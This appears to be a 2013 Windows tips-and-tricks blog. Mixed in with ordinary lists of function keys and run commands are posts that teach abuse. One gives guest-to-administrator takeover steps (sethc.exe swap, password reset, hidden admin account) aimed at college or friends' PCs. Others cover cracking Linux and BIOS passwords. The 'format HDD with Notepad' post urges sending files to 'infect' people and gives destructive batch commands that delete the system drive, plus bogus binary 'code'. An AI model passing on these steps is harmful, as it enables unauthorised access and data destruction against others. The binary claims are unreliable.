Tuesday 20 August 2013

What are the F1through F12 keys?


What are the F1through F12 keys?



Commonly known as "function keys", F1 through
F12 may have a variety of different uses or no
use at all. Depending on the installed operatingsystem and the software program currently
open will change how each of these keys
operate. A program is capable of not only using
each of the function keys, but also combining
the function keys with the ALT or CTRL key, for
example, Microsoft Windows users can press
ALT + F4 to close the program currently active.
Below is a short-listing of some of the common
functions of the functions keys. As mentioned
above not all programs support function keys
and may perform different tasks then those
mentioned below. If you are looking for more
specific shortcut keys and function key
examples we suggest seeing our shortcut key

F1
Almost always used as the help key,
almost every program will open the help
screen when this key is pressed.
Enter CMOS Setup.
Windows Key + F1 would open the
Microsoft Windows help and support
center.
Open the Task Pane.


F2
In Windows renames a highlighted icon,
file, or folder in all versions of Windows.
Alt + Ctrl + F2 opens document window
in Microsoft Word.
Ctrl + F2 displays the print preview
window in Microsoft Word.
Quickly rename a selected file or folder.
Enter CMOS Setup.


F3
Often opens a search feature for many
programs including Microsoft Windows
when at the Windows Desktop..
In MS-DOS or Windows command line F3
will repeat the last command.
Shift + F3 will change the text in
Microsoft Word from upper to lower case
or a capital letter at the beginning of
every word.
Windows Key + F3 opens the Advanced
find window in Microsoft Outlook.
Open Mission Control on an Apple
computer running Mac OS X.


F4
Open find window in Windows 95 to XP.
Open the address bar in WindowsExplorer and Internet Explorer.
Repeat the last action performed (Word
2000+)
Alt + F4 will close the program window
currently active in Microsoft Windows.
Ctrl + F4 will close the open window
within the current active window in
Microsoft Windows.

F5
In all modern Internet browsers pressing
F5 will refresh or reload the page or
document window.
Open the find, replace, and go to window
in Microsoft Word.
Starts a slideshow in PowerPoint.
F6
Move the cursor to the Address bar in
Internet Explorer, Mozilla Firefox, and
most other Internet browsers.
Ctrl + Shift + F6 opens to another open
Microsoft Word document.

F7
Commonly used to spell check and
grammar check a document in Microsoft
programs such as Microsoft Word,
Outlook, etc.
Shift + F7 runs a Thesaurus check on the
word highlighted.
Turns on Caret browsing in Mozilla
Firefox.
F8
Function key used to enter the Windows
startup menu, commonly used to accessWindows Safe Mode.

F9
Opens the Measurements toolbar in
Quark 5.0.
With Mac OS 10.3 or later shows all open
Windows.
Using the Fn key and F9 at the same
time will open Mission Control on an
Apple computer running Mac OS X.

F10
In Microsoft Windows activates the menu
bar of an open application.
Shift + F10 is the same as right-clicking
on a highlighted icon, file, or Internet
link.
Access the hidden recovery partition on
HP and Sony computers.
Enter CMOS Setup.
With Mac OS 10.3 or later shows all open
Windows for active program.

F11
Full-screen mode in all modern Internet
browsers.
Ctrl + F11 as computer is starting to
access the hidden recovery partition on
many Dell computers.
Access the hidden recovery partition on
eMachines, Gateway, and Lenovo
computers.
With Mac OS 10.4 or later hides all open
windows and shows the Desktop.

F12
Open the Save as window in Microsoft
Word.
Shift + F12 save the Microsoft Word
document.
Ctrl + Shift + F12 prints a document in
Microsoft Word.
Preview a page in Microsoft Expression
Web
Open Firebug.
With an Apple running Mac OS 10.4 or
later F12 will show or hides the
Dashboard.

F13 - F24
Early IBM computers also had keyboards
with F13 through F24 keys. However,
because these keyboards are no longer
used they are not listed on this page.











HOW TO HIDE DRIVES USING CMD


HOW TO HIDE DRIVES  USING CMD


    Serach cmd and run it as Administrator.
    Type mountvol in command prompt and press enter. It will show the ID of drives, note the ID of drive you want to hide.



    We noted down for F:, viz

 \\?\Volume{14394d58-7caf-11e2-af9b-806e6f6e6963}\
     F:\

    To hide the drive, you have to type in command prompt:

mountvol F: /d

    To bring it back, you have to type:

mountvol f: [volume id]    (The volume id is the one we noted down earlier), our command was:
mountvol f: \\?\Volume{14394d58-7caf-11e2-af9b-806e6f6e6963}\

Note : Be careful while noting down volume ID, if you do it wrong, you will lose all the data of that drive. You should not try this with your system drive.

HAVE A TRICKY DAY!!!



Hack admin password from guest account


Hack admin password from guest account !! yayy now its possible :)

Ever wanted to hack your college PC with guest account/student or just wanted to hack your friend’s PC to make him gawk when you tell him your success story of hacking? Well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privileges an administrator enjoys on windows..

Concept:

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privileges because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites:

Guest account with write access to system32.

Here is how to do that -

* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* Rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
When asked to overwrite,overwrite the sethc.exe
* Now log ut from your guest account and at the user select window,press shift key 5 times.
* Instead of sticky Key confirmation dialog,command prompt with full administrator privileges will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
* You will see “ The command completed successfully” and then exit the command prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.

Further..


Also, you can further create a new user at the command prompt by typing “NET USER ARMAAN/ADD” where “ARMAAN” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigating to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]

Here create a new DWORD value, write its name as the “user name” that u created for your admin account!

‘’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’
Concept
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites
Guest account with write access to system 32.
Here is how to do that -
·         Go to C:/windows/system32
·         Copy cmd.exe and paste it on desktop
·         rename cmd.exe to sethc.exe
·         Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

·         Now Log out from your guest account and at the user select window,press shift key 5 times.
·         Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

·         Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
·         You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
·         Congrats You have hacked admin from guest account.


Further..
Also, you can further create a new user at the command prompt by typing “NET USER XERO /ADD” where “XERO” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :)

I hope that was informative.

how to enable this (Ctrl+V) shortcut for pasting in DOS too


Today, i will show you how to enable this (Ctrl+V) shortcut for pasting in DOS too. Here are 

the steps:

    Download Autohotkey from here and install it.

some more run line commands


Run Line Commands

These are GUI applications that can be opened from the run line.
These applications are not located in the C:\windows\system32\ directory, the
keys for these applications are located in the registry under:
HKLM\software\microsoft\windows\currentversion\app paths
BCKGZM.EXE - Backgammon
CHKRZM.EXE - Checkers
CONF.EXE - NetMeeting
DIALER.EXE - Phone Dialer
HELPCTR.EXE - Help and Support
HRTZZM.EXE - Internet Hearts
HYPERTRM.EXE - HyperTerminal
ICWCONN1.EXE - Internet Connection Wizard
IEXPLORE.EXE - Internet Explorer
INETWIZ.EXE - Setup Your Internet Connection
INSTALL.EXE - User's Folder
MIGWIZ.EXE - File and Settings Transfer Wizard
MOVIEMK.EXE - Windows Movie Maker
MPLAYER2.EXE - Windows Media Player Version 6.4.09.1120
MSCONFIG.EXE - System Configuration Utility
MSIMN.EXE - Outlook Express
MSINFO32.EXE - System Information
MSMSGS.EXE - Windows Messenger
MSN6.EXE - MSN Explorer
PBRUSH.EXE - Paint
PINBALL.EXE - Pinball
RVSEZM.EXE - Reversi
SHVLZM.EXE - Spades
TABLE30.EXE - User's Folder
WAB.EXE - Windows Address Book
WABMIG.EXE - Address Book Import Tool
WINNT32.EXE - User's Folder
WMPLAYER.EXE - Windows Media Player
WRITE.EXE - Wordpad

These .EXE files reside in (c:\windows\system32\) or (c:\windows\) directory.
ACCWIZ.EXE - Accessibility Wizard
CALC.EXE - Calculator
CHARMAP.EXE - Character Map
CLEANMGR.EXE - Disk Space Cleanup Manager
CLICONFG.EXE - SQL Client Configuration Utility
CLIPBRD.EXE - Clipbook Viewer
CLSPACK.EXE - Class Package Export Tool
CMD.EXE - Command Line
CMSTP.EXE - Connection Manager Profile Installer
CONTROL.EXE - Control Panel
DCOMCNFG.EXE - Component Services
DDESHARE.EXE - DDE Share
DRWATSON.EXE - Doctor Watson v1.00b
DRWTSN32.EXE - Doctor Watson Settings
DVDPLAY.EXE - DVD Player
DXDIAG.EXE - DirectX Diagnostics
EUDCEDIT.EXE - Private Character Editor
EVENTVWR.EXE - Event Viewer
EXPLORER.EXE - Windows Explorer
FREECELL.EXE - Free Cell
FXSCLNT.EXE - Fax Console
FXSCOVER.EXE - Fax Cover Page Editor
FXSEND.EXE - MS Fax Send Note Utility
IEXPRESS.EXE - IExpress 2.0
LOGOFF.EXE - System Logoff
MAGNIFY.EXE - Microsoft Magnifier
MMC.EXE - Microsoft Management Console
MOBSYNC.EXE - Microsoft Synchronization Manager
MPLAY32.EXE - Windows Media Player version 5.1
MSHEARTS.EXE - Hearts
MSPAINT.EXE - Paint
MSTSC.EXE - Remote Desktop Connection
NARRATOR.EXE - Microsoft Narrator
NETSETUP.EXE - Network Setup Wizard
NOTEPAD.EXE - Notepad
NSLOOKUP.EXE - NSLookup Application
NTSD.EXE - Symbolic Debugger for Windows 2000
ODBCAD32.EXE - ODBC Data Source Administrator
OSK.EXE - On Screen Keyboard
OSUNINST.EXE - Windows Uninstall Utility
PACKAGER.EXE - Object Packager
PERFMON.EXE - Performance Monitor
PROGMAN.EXE - Program Manager
RASPHONE.EXE - Remote Access Phonebook
REGEDIT.EXE - Registry Editor
REGEDT32.EXE - Registry Editor
RESET.EXE - Resets Session
RSTRUI.EXE - System Restore
RTCSHARE.EXE - RTC Application Sharing
SFC.EXE - System File Checker
SHRPUBW.EXE - Create Shared Folder
SHUTDOWN.EXE - System Shutdown
SIGVERIF.EXE - File Signature Verification
SNDREC32.EXE - Sound Recorder
SNDVOL32.EXE - Sound Volume
SOL.EXE - Solitaire

SPIDER.EXE - Spider Solitaire
SYNCAPP.EXE - Create A Briefcase
SYSEDIT.EXE - System Configuration Editor
SYSKEY.EXE - SAM Lock Tool
TASKMGR.EXE - Task Manager
TELNET.EXE - MS Telnet Client
TSSHUTDN.EXE - System Shutdown
TOURSTART.EXE - Windows Tour Launcher
UTILMAN.EXE - System Utility Manager
USERINIT.EXE - My Documents
VERIFIER.EXE - Driver Verifier Manager
WIAACMGR.EXE - Scanner and Camera Wizard
WINCHAT.EXE - Windows for Workgroups Chat
WINHELP.EXE - Windows Help Engine
WINHLP32.EXE - Help
WINMINE.EXE - Minesweeper
WINVER.EXE - Windows Version Information
WRITE.EXE - WordPad
WSCRIPT.EXE - Windows Script Host Settings
WUPDMGR.EXE - Windows Update

The following are Control Panel applets that can be run from the run line.
They are located in the c:\windows\system32 directory, and have the file type
extension ".CPL".
ACCESS.CPL - Accessibility Options
APPWIZ.CPL - Add or Remove Programs
DESK.CPL - Display Properties
HDWWIZ.CPL - Add Hardware Wizard
INETCPL.CPL - Internet Explorer Properties
INTL.CPL - Regional and Language Options
JOY.CPL - Game Controllers
MAIN.CPL - Mouse Properties
MMSYS.CPL - Sounds and Audio Device Properties
NCPA.CPL - Network Connections
NUSRMGR.CPL - User Accounts
ODBCCP32.CPL - ODBC Data Source Administrator
POWERCFG.CPL - Power Options Properties
SYSDM.CPL - System Properties
TELEPHON.CPL - Phone and Modem Options
TIMEDATE.CPL - Date and Time Properties
The following are Microsoft Management Console Snap-ins that can be opened from
the run line. These applications have the file type extension ".MSC".
CERTMGR.MSC - Certificates
CIADV.MSC - Indexing Service
COMPMGMT.MSC - Computer Management
DEVMGMT.MSC - Device Manager
DFRG.MSC - Disk Defragmenter
DISKMGMT.MSC - Disk Management
EVENTVWR.MSC - Event Viewer
FSMGMT.MSC - Shared Folders
LUSRMGR.MSC - Local Users and Groups
NTMSMGR.MSC - Removable Storage
NTMSOPRQ.MSC - Removable Storage Operator Requests
PERFMON.MSC - Performance Monitor
SERVICES.MSC - Services
WMIMGMT.MSC - Windows Management Infrastructure

some more command Codes


some more command  Codes. Kindly Add if U know more !

Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Accessibility Controls
access.cpl
Administrative Tools
control admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
timedate.cpl
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (If Installed)*
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab Preselected)
control color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control folders
Fonts
control fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
IP Configuration (Display Connection Configuration)
ipconfig /all
IP Configuration (Display DNS Cache Contents)
ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)
ipconfig /flushdns
IP Configuration (Release All Connections)
ipconfig /release
IP Configuration (Renew All Connections)
ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)
ipconfig /registerdns
IP Configuration (Display DHCP Class ID)
ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)
ipconfig /setclassid
Java Control Panel (If Installed)
jpicpl32.cpl
Java Control Panel (If Installed)
javaws
Keyboard Properties
control keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Microsoft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control mouse
Mouse Properties
main.cpl
Network Connections
control netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Notepad
notepad
Nview Desktop Manager (If Installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (If Installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedit32
Remote Desktop
mstsc
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitare Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility (Scan Immediately)
sfc /scannow
System File Checker Utility (Scan Once At Next Boot)
sfc /scanonce
System File Checker Utility (Scan On Every Boot)
sfc /scanboot
System File Checker Utility (Return to Default Setting)
sfc /revert
System File Checker Utility (Purge File Cache)
sfc /purgecache
System File Checker Utility (Set Cache Size to size x)
sfc /cachesize=x
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad
write

Monday 19 August 2013

WINDOWS TRICKS AND TIPS


windows Trick & Tips

These are window tips for Operating . they 100% working  . 
  
How to hide the Bat file code without using any third party software .

Step 1: Open the word pad. 
Start > Run > word pad  .
Copy the bat file and paste it into the word pad . 
Step 2: Now right click on the bat file. 
Step 3: Click on edit package. A new window will appear. Go to Edit menu. 
Step 4: Click on edit menu and select the copy package. 
Step 5: Now go to the place where you want to save the file. Like I went to c: drive. Then just paste the file. 
Step 6: A new file will be there with name of scrap. It will work as a batch file, when you will double click on this.   
Step 7: If you will try to open the file in wordpad, it will be in encoded form.
Cracking Linux Password when Grub cannot be changed
However, if the Grub is password protected, then this method will not work. So in such cases, we can use   the Linux Live CD to crack the Linux Password. Follow the below given steps to change the Linux Password, using the Linux Live CD.
  • Boot your computer from your Linux Live CD, choosing “Try Linux without any change to your computer” from the boot menu.
  • Once the system boots open up a new Terminal window and then type in the following command:
  • sudofdisk –l
  • This command is used to tell what device name the hard drive is using, which in most cases should be /dev/sda1, but could be different on your system.
  • Now you’ll need to create a directory to mount the hard drive on. Since we’re actually booting off the live cd, the directory doesn’t really get created anywhere.
  • sudomkdir /media/sda1
  • The next command will mount the hard drive in the /media/sda1 folder.
  • sudo mount /dev/sda1 /media/sda1
  • Now it’s time for the command that actually does the magic:
  • chroot.
  • This command is used to open up a shell with a different root directory than the current shell is using, and we’ll pass in the folder where we mounted the hard drive.
  • sudochroot /media/sda1
  • Now you should be able to use the passwd command to change your user account’s password, and it will be applied to the hard drive since we are using chroot.
  • passwd<username>
  • Now you should be able to reboot your system and log yourself in with your new password.

 

How To Hack A Bios Password
Step1=> Some of these methods may or may not work, depending on the age and the type of computer or laptop you are using. Please only try this on your own computer or on a computer for which someone has specifically asked for your assistance.

Step2=> To reset a BIOS password, the password prompt that you must pass in order for the PC to boot, you could try clearing the CMOS settings by jumping the corresponding pins on the motherboard. Open the PC case and locate the pins labeled "Clear" or "PWD". If you are able to locate them, place a jumper on the two pins, connecting them together. When the PC is powered on with the pins jumped, it will bypass the password in many cases.

Step3=> Another way to reset the BIOS password is to remove the CMOS battery backup. When you open the case and look at the motherboard, this battery resembles a large, flat watch battery and on most motherboards, it may be removed temporarily. Remove the battery for 15 minutes, replace it, and try turning the PC back on.

Step4=> An additional method is to overload the keyboard buffer by holding down a key on the keyboard from the moment the PC is powered on. This seldom works, but in some cases, it will prompt an error message and take the user through to the BIOS setup.

Step5=> Trick for bypassing the BIOS password on many Toshiba laptops. Acquire a DB25 printer cable. Remove the sheath from around the cable connector and note that the pins are labeled 1 through 25. Connect and solder the following wires together: (1+5+10), (2+11), (3+17), (4+12), (6+16), (7+13), (8+14), and (9+15). Protect each connection by wrapping it in electric tape. Connect the cable connector to the printer port on the back of the laptop and power it on. If done correctly, the laptop will boot directly to the operating system, bypassing the BIOS password.

Step6=> If the BIOS password is not your problem or if you made it through that password and you are confronted by the operating system password on a Windows machine.
In that caes, When the computer is booting and has just finished the power-on self test, begin tapping the F8 key. Windows should redirect to a screen prompting several different ways to boot. Choose "Safe Mode." Too many people neglect to set a password for the administrator account on Windows computers. If this is the case, you can access the administrator account and change the password for the account that you were originally trying to access.

Step7=> If the administrator password has been set and you cannot gain access to it, don't worry, there are different types of software available that will allow you access to any Windows PC or laptop. Some do cost money. I do not want to endorse any of them specifically, but do a search on the internet and you will surely find them.

Create your own Run Command
1. Go to Start > Run (or press Win+R).
2. Enter %windir% and press enter to open the Windows Directory    
3. Go to File > New > Shortcut.
4. Go through the wizard to create a shortcut to the desired program, the name you give to the shortcut is what you type in the Run dialog to start the program.



Follow the steps to protect your system from virus

1) Click on Start button and go to RUN.

2)Type “gpedit.msc” without quotes in Run.

3)Go to computer configuration-> Administrative Templates -> System

4)Scroll down to “Turn off Autoplay” and double click on it.

5)Now click on the “Enabled” radio button, then for “Turn off Autoplay on” select “All drives”
Format your HDD with Notepad

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.

Step 1 => Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 => Save As An EXE Any Name Will Do

Step 3 => Send the EXE to People And Infect

OR

IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

Great trick Lock ur PC yourself
  lock ur pc.. open notepad copy and paste the script below and save it .VBS extention
 This wil create a shortcut.. run(click) it
  set WshShell = WScript.CreateObject("WScript.Shell")
  set oShellLink = WshShell.CreateShortcut(wshShell.SpecialFolders("Desktop") & "\LockWorkstation.lnk")
  oShellLink.TargetPath = "%windir%\system32\rundll32.exe"
  oShellLink.Arguments = "user32.dll,LockWorkStation"
  oShellLink.Save
  first select a folder for example i'll use a folder name movies in D drive D:\movies\
  in the same drive u create a text file and type
  ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}
  and save it as loc.bat
  again u type in a notepad as
  ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies
  and save it as key.bat
  now in D drive u can see two batch files loc and key.. when u double click loc the movie folder will change to control panel and whn u double click key the control panel will change to normal folder..
  there are two more different tricks in dis site to lock ur pc down in a unique ways.. donno where i have typed it.. !!!



How to Block A Website in All Web Browsers
This action will require you to edit your Host file. Your host file is a computer file used to store information on where to find a node on a computer network. For more a more detailed description. Check out this link Host File Description Link

In Windows XP

1. Click Start->All Programs->Accessories->Command Prompt2. Click Command Prompt This will open a DOS command window.
3. Type: notepad C:/Windows/System32/drivers/etc/hosts
4. Locate the line 127.0.0.1 localhost
5. To block the website google.com for example, just add this text under 127.0.0.1 localhost:

127.0.0.1 google.com
127.0.0.1 www.google.com

You can add as many sites any site, However you will need to prefix it with "127.0.0.1".
6. Save the file .
Google will now be blocked in all web browser. This is an advanced but easy method on how to blow a website. 
How To Convert Fat32 Partiton Into NTFS In Win Xp
  1. Go to start->Run type cmd and press Enter.
  2. Type VOL C: and note down the information for volume c. (Change drive letter to the drive you want to convert)
  3. Now type CONVERT C:/FS:NTFS.  (Instead of C: enter any drive name you wan Converting FAT32 to NTFS Remember, do not switch off your PC directly when the process is going on.
  4. Now check your drive by repeating step 2.
How to hide Data in Notepad
1=>  Open command prompt, you may change to any directory as you like to create the text file.
2=> Type notepad MyFile.txt:StoreHiddenData then press enter. MyFile.txt is the text file you are going to create whereas StoreHiddenData is the alternate stream name.
3=> A message will be pop up “Cannot find the C:\MyFile.txt:StoreHiddenData.txt file”. Do you want to create a new file?”, click OK button to proceed create the new file.
4=> A notepad will be pop up. Type any data that you want to be hidden from others. Save the file and you are now successfully creating hidden data for this file.


If you have more then one operating system installed or wish to remove an operating system from the boot menu, you can use the following information.
1.Click on Start, Control Panel, System, Advanced.
2.Under Startup and Recovery, click Settings.
3.Under Default Operating System, choose one of the following:
"Microsoft Windows XP Professional /fastdetect"
-or-
"Microsoft Windows XP Home /fasdetect"
4.Take the checkmark out of the box for "Time to display a list of Operating Systems".
5.Click Apply and Ok, and reboot the system.
*If you wish to edit the boot.ini file manually, click on the button "EDIT".